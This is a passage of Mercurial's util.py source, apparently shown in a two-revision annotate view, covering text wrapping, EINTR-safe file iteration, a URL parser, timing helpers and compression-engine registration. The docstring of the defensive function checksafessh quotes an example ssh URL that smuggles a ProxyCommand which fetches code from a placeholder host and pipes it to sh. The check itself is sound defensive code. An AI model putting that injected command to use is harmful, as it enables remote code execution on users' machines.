2577 2810 # The current line is full, and the next chunk is too big to
2578 2811 # fit on *any* line (not just this one).
2579 2812 if chunks and colwidth(chunks[-1]) > width:
2580 2813 self._handle_long_word(chunks, cur_line, cur_len, width)
2581 2814
2582 2815 # If the last chunk on this line is all whitespace, drop it.
2583 2816 if (self.drop_whitespace and
2584 2817 cur_line and cur_line[-1].strip() == r''):
2585 2818 del cur_line[-1]
2586 2819
2587 2820 # Convert current line back to a string and store it in list
2588 2821 # of all lines (return value).
2589 2822 if cur_line:
2590 2823 lines.append(indent + r''.join(cur_line))
2591 2824
2592 2825 return lines
2593 2826
2594 2827 global MBTextWrapper
2595 2828 MBTextWrapper = tw
2596 2829 return tw(**kwargs)
2597 2830
2598 2831 def wrap(line, width, initindent='', hangindent=''):
2599 2832 maxindent = max(len(hangindent), len(initindent))
2600 2833 if width <= maxindent:
2601 2834 # adjust for weird terminal size
2602 2835 width = max(78, maxindent + 1)
2603 2836 line = line.decode(pycompat.sysstr(encoding.encoding),
2604 2837 pycompat.sysstr(encoding.encodingmode))
2605 2838 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2606 2839 pycompat.sysstr(encoding.encodingmode))
2607 2840 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2608 2841 pycompat.sysstr(encoding.encodingmode))
2609 2842 wrapper = MBTextWrapper(width=width,
2610 2843 initial_indent=initindent,
2611 2844 subsequent_indent=hangindent)
2612 2845 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2613 2846
2614 2847 if (pyplatform.python_implementation() == 'CPython' and
2615 2848 sys.version_info < (3, 0)):
2616 2849 # There is an issue in CPython that some IO methods do not handle EINTR
2617 2850 # correctly. The following table shows what CPython version (and functions)
2618 2851 # are affected (buggy: has the EINTR bug, okay: otherwise):
2619 2852 #
2620 2853 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2621 2854 # --------------------------------------------------
2622 2855 # fp.__iter__ | buggy | buggy | okay
2623 2856 # fp.read* | buggy | okay [1] | okay
2624 2857 #
2625 2858 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2626 2859 #
2627 2860 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2628 2861 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2629 2862 #
2630 2863 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2631 2864 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2632 2865 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2633 2866 # fp.__iter__ but not other fp.read* methods.
2634 2867 #
2635 2868 # On modern systems like Linux, the "read" syscall cannot be interrupted
2636 2869 # when reading "fast" files like on-disk files. So the EINTR issue only
2637 2870 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2638 2871 # files approximately as "fast" files and use the fast (unsafe) code path,
2639 2872 # to minimize the performance impact.
2640 2873 if sys.version_info >= (2, 7, 4):
2641 2874 # fp.readline deals with EINTR correctly, use it as a workaround.
2642 2875 def _safeiterfile(fp):
2643 2876 return iter(fp.readline, '')
2644 2877 else:
2645 2878 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2646 2879 # note: this may block longer than necessary because of bufsize.
2647 2880 def _safeiterfile(fp, bufsize=4096):
2648 2881 fd = fp.fileno()
2649 2882 line = ''
2650 2883 while True:
2651 2884 try:
2652 2885 buf = os.read(fd, bufsize)
2653 2886 except OSError as ex:
2654 2887 # os.read only raises EINTR before any data is read
2655 2888 if ex.errno == errno.EINTR:
2656 2889 continue
2657 2890 else:
2658 2891 raise
2659 2892 line += buf
2660 2893 if '\n' in buf:
2661 2894 splitted = line.splitlines(True)
2662 2895 line = ''
2663 2896 for l in splitted:
2664 2897 if l[-1] == '\n':
2665 2898 yield l
2666 2899 else:
2667 2900 line = l
2668 2901 if not buf:
2669 2902 break
2670 2903 if line:
2671 2904 yield line
2672 2905
2673 2906 def iterfile(fp):
2674 2907 fastpath = True
2675 2908 if type(fp) is file:
2676 2909 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2677 2910 if fastpath:
2678 2911 return fp
2679 2912 else:
2680 2913 return _safeiterfile(fp)
2681 2914 else:
2682 2915 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2683 2916 def iterfile(fp):
2684 2917 return fp
2685 2918
2686 2919 def iterlines(iterator):
2687 2920 for chunk in iterator:
2688 2921 for line in chunk.splitlines():
2689 2922 yield line
2690 2923
2691 2924 def expandpath(path):
2692 2925 return os.path.expanduser(os.path.expandvars(path))
2693 2926
2694 2927 def hgcmd():
2695 2928 """Return the command used to execute current hg
2696 2929
2697 2930 This is different from hgexecutable() because on Windows we want
2698 2931 to avoid things opening new shell windows like batch files, so we
2699 2932 get either the python call or current executable.
2700 2933 """
2701 2934 if mainfrozen():
2702 2935 if getattr(sys, 'frozen', None) == 'macosx_app':
2703 2936 # Env variable set by py2app
2704 2937 return [encoding.environ['EXECUTABLEPATH']]
2705 2938 else:
2706 2939 return [pycompat.sysexecutable]
2707 2940 return gethgcmd()
2708 2941
2709 2942 def rundetached(args, condfn):
2710 2943 """Execute the argument list in a detached process.
2711 2944
2712 2945 condfn is a callable which is called repeatedly and should return
2713 2946 True once the child process is known to have started successfully.
2714 2947 At this point, the child process PID is returned. If the child
2715 2948 process fails to start or finishes before condfn() evaluates to
2716 2949 True, return -1.
2717 2950 """
2718 2951 # Windows case is easier because the child process is either
2719 2952 # successfully starting and validating the condition or exiting
2720 2953 # on failure. We just poll on its PID. On Unix, if the child
2721 2954 # process fails to start, it will be left in a zombie state until
2722 2955 # the parent wait on it, which we cannot do since we expect a long
2723 2956 # running process on success. Instead we listen for SIGCHLD telling
2724 2957 # us our child process terminated.
2725 2958 terminated = set()
2726 2959 def handler(signum, frame):
2727 2960 terminated.add(os.wait())
2728 2961 prevhandler = None
2729 2962 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2730 2963 if SIGCHLD is not None:
2731 2964 prevhandler = signal.signal(SIGCHLD, handler)
2732 2965 try:
2733 2966 pid = spawndetached(args)
2734 2967 while not condfn():
2735 2968 if ((pid in terminated or not testpid(pid))
2736 2969 and not condfn()):
2737 2970 return -1
2738 2971 time.sleep(0.1)
2739 2972 return pid
2740 2973 finally:
2741 2974 if prevhandler is not None:
2742 2975 signal.signal(signal.SIGCHLD, prevhandler)
2743 2976
2744 2977 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2745 2978 """Return the result of interpolating items in the mapping into string s.
2746 2979
2747 2980 prefix is a single character string, or a two character string with
2748 2981 a backslash as the first character if the prefix needs to be escaped in
2749 2982 a regular expression.
2750 2983
2751 2984 fn is an optional function that will be applied to the replacement text
2752 2985 just before replacement.
2753 2986
2754 2987 escape_prefix is an optional flag that allows using doubled prefix for
2755 2988 its escaping.
2756 2989 """
2757 2990 fn = fn or (lambda s: s)
2758 2991 patterns = '|'.join(mapping.keys())
2759 2992 if escape_prefix:
2760 2993 patterns += '|' + prefix
2761 2994 if len(prefix) > 1:
2762 2995 prefix_char = prefix[1:]
2763 2996 else:
2764 2997 prefix_char = prefix
2765 2998 mapping[prefix_char] = prefix_char
2766 2999 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2767 3000 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2768 3001
2769 3002 def getport(port):
2770 3003 """Return the port for a given network service.
2771 3004
2772 3005 If port is an integer, it's returned as is. If it's a string, it's
2773 3006 looked up using socket.getservbyname(). If there's no matching
2774 3007 service, error.Abort is raised.
2775 3008 """
2776 3009 try:
2777 3010 return int(port)
2778 3011 except ValueError:
2779 3012 pass
2780 3013
2781 3014 try:
2782 3015 return socket.getservbyname(pycompat.sysstr(port))
2783 3016 except socket.error:
2784 3017 raise Abort(_("no port number associated with service '%s'") % port)
2785 3018
2786 3019 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2787 3020 '0': False, 'no': False, 'false': False, 'off': False,
2788 3021 'never': False}
2789 3022
2790 3023 def parsebool(s):
2791 3024 """Parse s into a boolean.
2792 3025
2793 3026 If s is not a valid boolean, returns None.
2794 3027 """
2795 3028 return _booleans.get(s.lower(), None)
2796 3029
2797 3030 _hextochr = dict((a + b, chr(int(a + b, 16)))
2798 3031 for a in string.hexdigits for b in string.hexdigits)
2799 3032
2800 3033 class url(object):
2801 3034 r"""Reliable URL parser.
2802 3035
2803 3036 This parses URLs and provides attributes for the following
2804 3037 components:
2805 3038
2806 3039 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2807 3040
2808 3041 Missing components are set to None. The only exception is
2809 3042 fragment, which is set to '' if present but empty.
2810 3043
2811 3044 If parsefragment is False, fragment is included in query. If
2812 3045 parsequery is False, query is included in path. If both are
2813 3046 False, both fragment and query are included in path.
2814 3047
2815 3048 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2816 3049
2817 3050 Note that for backward compatibility reasons, bundle URLs do not
2818 3051 take host names. That means 'bundle://../' has a path of '../'.
2819 3052
2820 3053 Examples:
2821 3054
2822 3055 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2823 3056 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2824 3057 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2825 3058 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2826 3059 >>> url(b'file:///home/joe/repo')
2827 3060 <url scheme: 'file', path: '/home/joe/repo'>
2828 3061 >>> url(b'file:///c:/temp/foo/')
2829 3062 <url scheme: 'file', path: 'c:/temp/foo/'>
2830 3063 >>> url(b'bundle:foo')
2831 3064 <url scheme: 'bundle', path: 'foo'>
2832 3065 >>> url(b'bundle://../foo')
2833 3066 <url scheme: 'bundle', path: '../foo'>
2834 3067 >>> url(br'c:\foo\bar')
2835 3068 <url path: 'c:\\foo\\bar'>
2836 3069 >>> url(br'\\blah\blah\blah')
2837 3070 <url path: '\\\\blah\\blah\\blah'>
2838 3071 >>> url(br'\\blah\blah\blah#baz')
2839 3072 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2840 3073 >>> url(br'file:///C:\users\me')
2841 3074 <url scheme: 'file', path: 'C:\\users\\me'>
2842 3075
2843 3076 Authentication credentials:
2844 3077
2845 3078 >>> url(b'ssh://joe:xyz@x/repo')
2846 3079 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2847 3080 >>> url(b'ssh://joe@x/repo')
2848 3081 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2849 3082
2850 3083 Query strings and fragments:
2851 3084
2852 3085 >>> url(b'http://host/a?b#c')
2853 3086 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2854 3087 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2855 3088 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2856 3089
2857 3090 Empty path:
2858 3091
2859 3092 >>> url(b'')
2860 3093 <url path: ''>
2861 3094 >>> url(b'#a')
2862 3095 <url path: '', fragment: 'a'>
2863 3096 >>> url(b'http://host/')
2864 3097 <url scheme: 'http', host: 'host', path: ''>
2865 3098 >>> url(b'http://host/#a')
2866 3099 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2867 3100
2868 3101 Only scheme:
2869 3102
2870 3103 >>> url(b'http:')
2871 3104 <url scheme: 'http'>
2872 3105 """
2873 3106
2874 3107 _safechars = "!~*'()+"
2875 3108 _safepchars = "/!~*'()+:\\"
2876 3109 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2877 3110
2878 3111 def __init__(self, path, parsequery=True, parsefragment=True):
2879 3112 # We slowly chomp away at path until we have only the path left
2880 3113 self.scheme = self.user = self.passwd = self.host = None
2881 3114 self.port = self.path = self.query = self.fragment = None
2882 3115 self._localpath = True
2883 3116 self._hostport = ''
2884 3117 self._origpath = path
2885 3118
2886 3119 if parsefragment and '#' in path:
2887 3120 path, self.fragment = path.split('#', 1)
2888 3121
2889 3122 # special case for Windows drive letters and UNC paths
2890 3123 if hasdriveletter(path) or path.startswith('\\\\'):
2891 3124 self.path = path
2892 3125 return
2893 3126
2894 3127 # For compatibility reasons, we can't handle bundle paths as
2895 3128 # normal URLS
2896 3129 if path.startswith('bundle:'):
2897 3130 self.scheme = 'bundle'
2898 3131 path = path[7:]
2899 3132 if path.startswith('//'):
2900 3133 path = path[2:]
2901 3134 self.path = path
2902 3135 return
2903 3136
2904 3137 if self._matchscheme(path):
2905 3138 parts = path.split(':', 1)
2906 3139 if parts[0]:
2907 3140 self.scheme, path = parts
2908 3141 self._localpath = False
2909 3142
2910 3143 if not path:
2911 3144 path = None
2912 3145 if self._localpath:
2913 3146 self.path = ''
2914 3147 return
2915 3148 else:
2916 3149 if self._localpath:
2917 3150 self.path = path
2918 3151 return
2919 3152
2920 3153 if parsequery and '?' in path:
2921 3154 path, self.query = path.split('?', 1)
2922 3155 if not path:
2923 3156 path = None
2924 3157 if not self.query:
2925 3158 self.query = None
2926 3159
2927 3160 # // is required to specify a host/authority
2928 3161 if path and path.startswith('//'):
2929 3162 parts = path[2:].split('/', 1)
2930 3163 if len(parts) > 1:
2931 3164 self.host, path = parts
2932 3165 else:
2933 3166 self.host = parts[0]
2934 3167 path = None
2935 3168 if not self.host:
2936 3169 self.host = None
2937 3170 # path of file:///d is /d
2938 3171 # path of file:///d:/ is d:/, not /d:/
2939 3172 if path and not hasdriveletter(path):
2940 3173 path = '/' + path
2941 3174
2942 3175 if self.host and '@' in self.host:
2943 3176 self.user, self.host = self.host.rsplit('@', 1)
2944 3177 if ':' in self.user:
2945 3178 self.user, self.passwd = self.user.split(':', 1)
2946 3179 if not self.host:
2947 3180 self.host = None
2948 3181
2949 3182 # Don't split on colons in IPv6 addresses without ports
2950 3183 if (self.host and ':' in self.host and
2951 3184 not (self.host.startswith('[') and self.host.endswith(']'))):
2952 3185 self._hostport = self.host
2953 3186 self.host, self.port = self.host.rsplit(':', 1)
2954 3187 if not self.host:
2955 3188 self.host = None
2956 3189
2957 3190 if (self.host and self.scheme == 'file' and
2958 3191 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2959 3192 raise Abort(_('file:// URLs can only refer to localhost'))
2960 3193
2961 3194 self.path = path
2962 3195
2963 3196 # leave the query string escaped
2964 3197 for a in ('user', 'passwd', 'host', 'port',
2965 3198 'path', 'fragment'):
2966 3199 v = getattr(self, a)
2967 3200 if v is not None:
2968 3201 setattr(self, a, urlreq.unquote(v))
2969 3202
2970 3203 @encoding.strmethod
2971 3204 def __repr__(self):
2972 3205 attrs = []
2973 3206 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2974 3207 'query', 'fragment'):
2975 3208 v = getattr(self, a)
2976 3209 if v is not None:
2977 3210 attrs.append('%s: %r' % (a, v))
2978 3211 return '<url %s>' % ', '.join(attrs)
2979 3212
2980 3213 def __bytes__(self):
2981 3214 r"""Join the URL's components back into a URL string.
2982 3215
2983 3216 Examples:
2984 3217
2985 3218 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2986 3219 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2987 3220 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2988 3221 'http://user:pw@host:80/?foo=bar&baz=42'
2989 3222 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2990 3223 'http://user:pw@host:80/?foo=bar%3dbaz'
2991 3224 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2992 3225 'ssh://user:pw@[::1]:2200//home/joe#'
2993 3226 >>> bytes(url(b'http://localhost:80//'))
2994 3227 'http://localhost:80//'
2995 3228 >>> bytes(url(b'http://localhost:80/'))
2996 3229 'http://localhost:80/'
2997 3230 >>> bytes(url(b'http://localhost:80'))
2998 3231 'http://localhost:80/'
2999 3232 >>> bytes(url(b'bundle:foo'))
3000 3233 'bundle:foo'
3001 3234 >>> bytes(url(b'bundle://../foo'))
3002 3235 'bundle:../foo'
3003 3236 >>> bytes(url(b'path'))
3004 3237 'path'
3005 3238 >>> bytes(url(b'file:///tmp/foo/bar'))
3006 3239 'file:///tmp/foo/bar'
3007 3240 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3008 3241 'file:///c:/tmp/foo/bar'
3009 3242 >>> print(url(br'bundle:foo\bar'))
3010 3243 bundle:foo\bar
3011 3244 >>> print(url(br'file:///D:\data\hg'))
3012 3245 file:///D:\data\hg
3013 3246 """
3014 3247 if self._localpath:
3015 3248 s = self.path
3016 3249 if self.scheme == 'bundle':
3017 3250 s = 'bundle:' + s
3018 3251 if self.fragment:
3019 3252 s += '#' + self.fragment
3020 3253 return s
3021 3254
3022 3255 s = self.scheme + ':'
3023 3256 if self.user or self.passwd or self.host:
3024 3257 s += '//'
3025 3258 elif self.scheme and (not self.path or self.path.startswith('/')
3026 3259 or hasdriveletter(self.path)):
3027 3260 s += '//'
3028 3261 if hasdriveletter(self.path):
3029 3262 s += '/'
3030 3263 if self.user:
3031 3264 s += urlreq.quote(self.user, safe=self._safechars)
3032 3265 if self.passwd:
3033 3266 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3034 3267 if self.user or self.passwd:
3035 3268 s += '@'
3036 3269 if self.host:
3037 3270 if not (self.host.startswith('[') and self.host.endswith(']')):
3038 3271 s += urlreq.quote(self.host)
3039 3272 else:
3040 3273 s += self.host
3041 3274 if self.port:
3042 3275 s += ':' + urlreq.quote(self.port)
3043 3276 if self.host:
3044 3277 s += '/'
3045 3278 if self.path:
3046 3279 # TODO: similar to the query string, we should not unescape the
3047 3280 # path when we store it, the path might contain '%2f' = '/',
3048 3281 # which we should *not* escape.
3049 3282 s += urlreq.quote(self.path, safe=self._safepchars)
3050 3283 if self.query:
3051 3284 # we store the query in escaped form.
3052 3285 s += '?' + self.query
3053 3286 if self.fragment is not None:
3054 3287 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3055 3288 return s
3056 3289
3057 3290 __str__ = encoding.strmethod(__bytes__)
3058 3291
3059 3292 def authinfo(self):
3060 3293 user, passwd = self.user, self.passwd
3061 3294 try:
3062 3295 self.user, self.passwd = None, None
3063 3296 s = bytes(self)
3064 3297 finally:
3065 3298 self.user, self.passwd = user, passwd
3066 3299 if not self.user:
3067 3300 return (s, None)
3068 3301 # authinfo[1] is passed to urllib2 password manager, and its
3069 3302 # URIs must not contain credentials. The host is passed in the
3070 3303 # URIs list because Python < 2.4.3 uses only that to search for
3071 3304 # a password.
3072 3305 return (s, (None, (s, self.host),
3073 3306 self.user, self.passwd or ''))
3074 3307
3075 3308 def isabs(self):
3076 3309 if self.scheme and self.scheme != 'file':
3077 3310 return True # remote URL
3078 3311 if hasdriveletter(self.path):
3079 3312 return True # absolute for our purposes - can't be joined()
3080 3313 if self.path.startswith(br'\\'):
3081 3314 return True # Windows UNC path
3082 3315 if self.path.startswith('/'):
3083 3316 return True # POSIX-style
3084 3317 return False
3085 3318
3086 3319 def localpath(self):
3087 3320 if self.scheme == 'file' or self.scheme == 'bundle':
3088 3321 path = self.path or '/'
3089 3322 # For Windows, we need to promote hosts containing drive
3090 3323 # letters to paths with drive letters.
3091 3324 if hasdriveletter(self._hostport):
3092 3325 path = self._hostport + '/' + self.path
3093 3326 elif (self.host is not None and self.path
3094 3327 and not hasdriveletter(path)):
3095 3328 path = '/' + path
3096 3329 return path
3097 3330 return self._origpath
3098 3331
3099 3332 def islocal(self):
3100 3333 '''whether localpath will return something that posixfile can open'''
3101 3334 return (not self.scheme or self.scheme == 'file'
3102 3335 or self.scheme == 'bundle')
3103 3336
3104 3337 def hasscheme(path):
3105 3338 return bool(url(path).scheme)
3106 3339
3107 3340 def hasdriveletter(path):
3108 3341 return path and path[1:2] == ':' and path[0:1].isalpha()
3109 3342
3110 3343 def urllocalpath(path):
3111 3344 return url(path, parsequery=False, parsefragment=False).localpath()
3112 3345
3113 3346 def checksafessh(path):
3114 3347 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3115 3348
3116 3349 This is a sanity check for ssh urls. ssh will parse the first item as
3117 3350 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3118 3351 Let's prevent these potentially exploited urls entirely and warn the
3119 3352 user.
3120 3353
3121 3354 Raises an error.Abort when the url is unsafe.
3122 3355 """
3123 3356 path = urlreq.unquote(path)
3124 3357 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3125 3358 raise error.Abort(_('potentially unsafe url: %r') %
3126 3359 (pycompat.bytestr(path),))
3127 3360
3128 3361 def hidepassword(u):
3129 3362 '''hide user credential in a url string'''
3130 3363 u = url(u)
3131 3364 if u.passwd:
3132 3365 u.passwd = '***'
3133 3366 return bytes(u)
3134 3367
3135 3368 def removeauth(u):
3136 3369 '''remove all authentication information from a url string'''
3137 3370 u = url(u)
3138 3371 u.user = u.passwd = None
3139 3372 return str(u)
3140 3373
3141 3374 timecount = unitcountfn(
3142 3375 (1, 1e3, _('%.0f s')),
3143 3376 (100, 1, _('%.1f s')),
3144 3377 (10, 1, _('%.2f s')),
3145 3378 (1, 1, _('%.3f s')),
3146 3379 (100, 0.001, _('%.1f ms')),
3147 3380 (10, 0.001, _('%.2f ms')),
3148 3381 (1, 0.001, _('%.3f ms')),
3149 3382 (100, 0.000001, _('%.1f us')),
3150 3383 (10, 0.000001, _('%.2f us')),
3151 3384 (1, 0.000001, _('%.3f us')),
3152 3385 (100, 0.000000001, _('%.1f ns')),
3153 3386 (10, 0.000000001, _('%.2f ns')),
3154 3387 (1, 0.000000001, _('%.3f ns')),
3155 3388 )
3156 3389
3157 3390 _timenesting = [0]
3158 3391
3159 3392 def timed(func):
3160 3393 '''Report the execution time of a function call to stderr.
3161 3394
3162 3395 During development, use as a decorator when you need to measure
3163 3396 the cost of a function, e.g. as follows:
3164 3397
3165 3398 @util.timed
3166 3399 def foo(a, b, c):
3167 3400 pass
3168 3401 '''
3169 3402
3170 3403 def wrapper(*args, **kwargs):
3171 3404 start = timer()
3172 3405 indent = 2
3173 3406 _timenesting[0] += indent
3174 3407 try:
3175 3408 return func(*args, **kwargs)
3176 3409 finally:
3177 3410 elapsed = timer() - start
3178 3411 _timenesting[0] -= indent
3179 3412 stderr.write('%s%s: %s\n' %
3180 3413 (' ' * _timenesting[0], func.__name__,
3181 3414 timecount(elapsed)))
3182 3415 return wrapper
3183 3416
3184 3417 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3185 3418 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3186 3419
3187 3420 def sizetoint(s):
3188 3421 '''Convert a space specifier to a byte count.
3189 3422
3190 3423 >>> sizetoint(b'30')
3191 3424 30
3192 3425 >>> sizetoint(b'2.2kb')
3193 3426 2252
3194 3427 >>> sizetoint(b'6M')
3195 3428 6291456
3196 3429 '''
3197 3430 t = s.strip().lower()
3198 3431 try:
3199 3432 for k, u in _sizeunits:
3200 3433 if t.endswith(k):
3201 3434 return int(float(t[:-len(k)]) * u)
3202 3435 return int(t)
3203 3436 except ValueError:
3204 3437 raise error.ParseError(_("couldn't parse size: %s") % s)
3205 3438
3206 3439 class hooks(object):
3207 3440 '''A collection of hook functions that can be used to extend a
3208 3441 function's behavior. Hooks are called in lexicographic order,
3209 3442 based on the names of their sources.'''
3210 3443
3211 3444 def __init__(self):
3212 3445 self._hooks = []
3213 3446
3214 3447 def add(self, source, hook):
3215 3448 self._hooks.append((source, hook))
3216 3449
3217 3450 def __call__(self, *args):
3218 3451 self._hooks.sort(key=lambda x: x[0])
3219 3452 results = []
3220 3453 for source, hook in self._hooks:
3221 3454 results.append(hook(*args))
3222 3455 return results
3223 3456
3224 3457 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3225 3458 '''Yields lines for a nicely formatted stacktrace.
3226 3459 Skips the 'skip' last entries, then return the last 'depth' entries.
3227 3460 Each file+linenumber is formatted according to fileline.
3228 3461 Each line is formatted according to line.
3229 3462 If line is None, it yields:
3230 3463 length of longest filepath+line number,
3231 3464 filepath+linenumber,
3232 3465 function
3233 3466
3234 3467 Not be used in production code but very convenient while developing.
3235 3468 '''
3236 3469 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3237 3470 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3238 3471 ][-depth:]
3239 3472 if entries:
3240 3473 fnmax = max(len(entry[0]) for entry in entries)
3241 3474 for fnln, func in entries:
3242 3475 if line is None:
3243 3476 yield (fnmax, fnln, func)
3244 3477 else:
3245 3478 yield line % (fnmax, fnln, func)
3246 3479
3247 3480 def debugstacktrace(msg='stacktrace', skip=0,
3248 3481 f=stderr, otherf=stdout, depth=0):
3249 3482 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3250 3483 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3251 3484 By default it will flush stdout first.
3252 3485 It can be used everywhere and intentionally does not require an ui object.
3253 3486 Not be used in production code but very convenient while developing.
3254 3487 '''
3255 3488 if otherf:
3256 3489 otherf.flush()
3257 3490 f.write('%s at:\n' % msg.rstrip())
3258 3491 for line in getstackframes(skip + 1, depth=depth):
3259 3492 f.write(line)
3260 3493 f.flush()
3261 3494
3262 3495 class dirs(object):
3263 3496 '''a multiset of directory names from a dirstate or manifest'''
3264 3497
3265 3498 def __init__(self, map, skip=None):
3266 3499 self._dirs = {}
3267 3500 addpath = self.addpath
3268 3501 if safehasattr(map, 'iteritems') and skip is not None:
3269 3502 for f, s in map.iteritems():
3270 3503 if s[0] != skip:
3271 3504 addpath(f)
3272 3505 else:
3273 3506 for f in map:
3274 3507 addpath(f)
3275 3508
3276 3509 def addpath(self, path):
3277 3510 dirs = self._dirs
3278 3511 for base in finddirs(path):
3279 3512 if base in dirs:
3280 3513 dirs[base] += 1
3281 3514 return
3282 3515 dirs[base] = 1
3283 3516
3284 3517 def delpath(self, path):
3285 3518 dirs = self._dirs
3286 3519 for base in finddirs(path):
3287 3520 if dirs[base] > 1:
3288 3521 dirs[base] -= 1
3289 3522 return
3290 3523 del dirs[base]
3291 3524
3292 3525 def __iter__(self):
3293 3526 return iter(self._dirs)
3294 3527
3295 3528 def __contains__(self, d):
3296 3529 return d in self._dirs
3297 3530
3298 3531 if safehasattr(parsers, 'dirs'):
3299 3532 dirs = parsers.dirs
3300 3533
3301 3534 def finddirs(path):
3302 3535 pos = path.rfind('/')
3303 3536 while pos != -1:
3304 3537 yield path[:pos]
3305 3538 pos = path.rfind('/', 0, pos)
3306 3539
3307 3540 # compression code
3308 3541
3309 3542 SERVERROLE = 'server'
3310 3543 CLIENTROLE = 'client'
3311 3544
3312 3545 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3313 3546 (u'name', u'serverpriority',
3314 3547 u'clientpriority'))
3315 3548
3316 3549 class compressormanager(object):
3317 3550 """Holds registrations of various compression engines.
3318 3551
3319 3552 This class essentially abstracts the differences between compression
3320 3553 engines to allow new compression formats to be added easily, possibly from
3321 3554 extensions.
3322 3555
3323 3556 Compressors are registered against the global instance by calling its
3324 3557 ``register()`` method.
3325 3558 """
3326 3559 def __init__(self):
3327 3560 self._engines = {}
3328 3561 # Bundle spec human name to engine name.
3329 3562 self._bundlenames = {}
3330 3563 # Internal bundle identifier to engine name.
3331 3564 self._bundletypes = {}
3332 3565 # Revlog header to engine name.
3333 3566 self._revlogheaders = {}
3334 3567 # Wire proto identifier to engine name.
3335 3568 self._wiretypes = {}
3336 3569
3337 3570 def __getitem__(self, key):
3338 3571 return self._engines[key]
3339 3572
3340 3573 def __contains__(self, key):
3341 3574 return key in self._engines
3342 3575
3343 3576 def __iter__(self):
3344 3577 return iter(self._engines.keys())
3345 3578
3346 3579 def register(self, engine):
3347 3580 """Register a compression engine with the manager.
3348 3581
3349 3582 The argument must be a ``compressionengine`` instance.
3350 3583 """
3351 3584 if not isinstance(engine, compressionengine):
3352 3585 raise ValueError(_('argument must be a compressionengine'))
3353 3586
3354 3587 name = engine.name()
3355 3588
3356 3589 if name in self._engines:
3357 3590 raise error.Abort(_('compression engine %s already registered') %
3358 3591 name)
3359 3592
3360 3593 bundleinfo = engine.bundletype()
3361 3594 if bundleinfo:
3362 3595 bundlename, bundletype = bundleinfo
3363 3596
3364 3597 if bundlename in self._bundlenames:
3365 3598 raise error.Abort(_('bundle name %s already registered') %
3366 3599 bundlename)
3367 3600 if bundletype in self._bundletypes:
3368 3601 raise error.Abort(_('bundle type %s already registered by %s') %
3369 3602 (bundletype, self._bundletypes[bundletype]))
3370 3603
3371 3604 # No external facing name declared.
3372 3605 if bundlename:
3373 3606 self._bundlenames[bundlename] = name
3374 3607
3375 3608 self._bundletypes[bundletype] = name
3376 3609
3377 3610 wiresupport = engine.wireprotosupport()
3378 3611 if wiresupport:
3379 3612 wiretype = wiresupport.name
3380 3613 if wiretype in self._wiretypes:
3381 3614 raise error.Abort(_('wire protocol compression %s already '
3382 3615 'registered by %s') %
3383 3616 (wiretype, self._wiretypes[wiretype]))
3384 3617
3385 3618 self._wiretypes[wiretype] = name
3386 3619
3387 3620 revlogheader = engine.revlogheader()
3388 3621 if revlogheader and revlogheader in self._revlogheaders:
3389 3622 raise error.Abort(_('revlog header %s already registered by %s') %
3390 3623 (revlogheader, self._revlogheaders[revlogheader]))
3391 3624
3392 3625 if revlogheader:
3393 3626 self._revlogheaders[revlogheader] = name
3394 3627
3395 3628 self._engines[name] = engine
3396 3629
3397 3630 @property
3398 3631 def supportedbundlenames(self):
3399 3632 return set(self._bundlenames.keys())
3400 3633
3401 3634 @property
